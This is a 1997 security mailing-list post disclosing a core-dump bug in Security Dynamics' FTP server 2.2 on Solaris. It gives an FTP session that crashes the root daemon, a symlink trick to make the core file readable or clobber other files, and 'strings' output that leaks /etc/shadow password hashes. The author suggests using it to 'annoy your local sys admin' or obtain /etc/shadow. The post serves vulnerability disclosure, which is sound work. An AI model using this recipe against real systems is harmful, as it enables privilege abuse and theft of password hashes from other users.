Date: Wed, 12 Nov 1997 11:56:29 -0500
From: sp00n <sp00n@COUPLER.300BAUD.COM>
To: best-of-security@cyber.com.au
Subject: BoS:      Bug In Security Dynamics' FTP server (Version 2.2)


Hi,

This bug is similar to the solaris and other ftp core dump bugs, slightly
diffrent though. BTW the machine is a SPARC 20 running 2.5, You can link
files and clobber them with a core to annoy your local sys admin or, even
better get /etc/shadow, u get the point... anyways

220 cornholio Security Dynamics' FTP server (Version 2.2) ready.
Name (.:joeuser): joeuser
331 Password required for mpotter.
Password:
230 User joeuser logged in.
ftp> cd /tmp
250 CWD command successful.
ftp> user root DUMP_CORE_FTPD
331 Password required for root.
530 Login incorrect.
Login failed.
ftp> quote pasv
421 Service not available, remote server has closed connection
ftp> quit
$ ls -la core
-rw-r-----   1 root     network   264656 Nov 12 11:14 core
At least it dosent dump 666 like solaris's in.ftpd :) But I cant read it
:(


Not too usefull You say? welp prior to dumping the core you should link it
to ps_data or something like that then you will get this

lrwxrwxrwx   1 joeuser  network        7 Nov 12 11:07 core -> ps_data
-rw-rw-r--   1 root     sys       264656 Nov 12 11:07 ps_data

$file ps_data
ps_data:        ELF 32-bit MSB core file SPARC Version 1, from '_sdi_ftpd'

$strings core | more

noaccess:*LK*:6445::::::
sp00n:o.IZGdC5eBTtKY:10175:7:28::::
root:aiqzotPNtTsI:9988::::::
user2:U6d5srjcJi/KU:9952::::::
joeuser:ktxVoVPQVIgc.:10175:7:28::::
root::0:root
other::1:
bin::2:root,daemon
sys::3:root,bin,adm
adm::4:root,daemon
uucp::5:root


[ Junk cut --Fyodor ]
<PRE>